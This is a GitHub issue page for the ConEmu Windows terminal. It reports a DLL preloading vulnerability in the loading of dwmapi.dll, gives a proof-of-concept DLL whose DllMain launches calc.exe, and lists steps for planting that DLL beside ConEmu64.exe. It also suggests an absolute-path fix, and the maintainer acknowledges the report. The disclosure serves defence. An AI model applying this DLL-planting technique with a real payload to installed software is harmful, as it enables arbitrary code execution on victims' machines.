search

Maximus5 / ConEmu

Customizable Windows terminal with tabs, splits, quake-style, hotkeys and more
https://conemu.github.io/
BSD 3-Clause "New" or "Revised" License
8.5k stars 570 forks source link

Attacker can execute arbitrary code execution using Dll Preloading Attack. #2556

Open comalmot opened 7 months ago

comalmot commented 7 months ago

Versions

ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z ) OS version: Windows 11 Pro x64 (Build 22621) Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe

Problem description

When ComEmu64.exe is executed, CDwmHelper::InitDwm () Method is invoked. ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp )

and in this Method, when Loading dwmapi.dll, LoadLibrary Function has no flag to prevent DLL Preloading.

https://github.com/Maximus5/ConEmu/blob/740b09c363cb16fbb730d72c53eaca1c530a016e/src/ConEmu/DwmHelper.cpp#L111

        mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));

so, attacker can moved to malicious dll file (filename is dwmapi.dll) in Directory where ConEmuPack installed, and can execute arbitrary code excution.

Steps to reproduce

  1. Generate Malicious DLL File :
#include "pch.h"
#include "framework.h"
#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

this code invoke calc.exe.

  1. put it down in directory ConEmuPack A is installed as dwmapi.dll

image

  1. Just Click ConEmu64.exe.

image

Actual results

ConEmu.exe and ConEmu64.exe must not effect DLL Preloading,

Expected results

ConEmu.exe and ConEmu64.exe is effected by DLL Preloading,

Additional files

PoC : 2023-11-22 23-40-42

How to Solve

https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1

we can use Absolute Path, and can use GetSystemDirectory() function to combine the System Directory path with the DLL file name(in this case, dwmapi.dll) to defend it.

Sorry for my Bad English 😢

Maximus5 commented 7 months ago

Thank you for raising the issue. I'll address this problem ASAP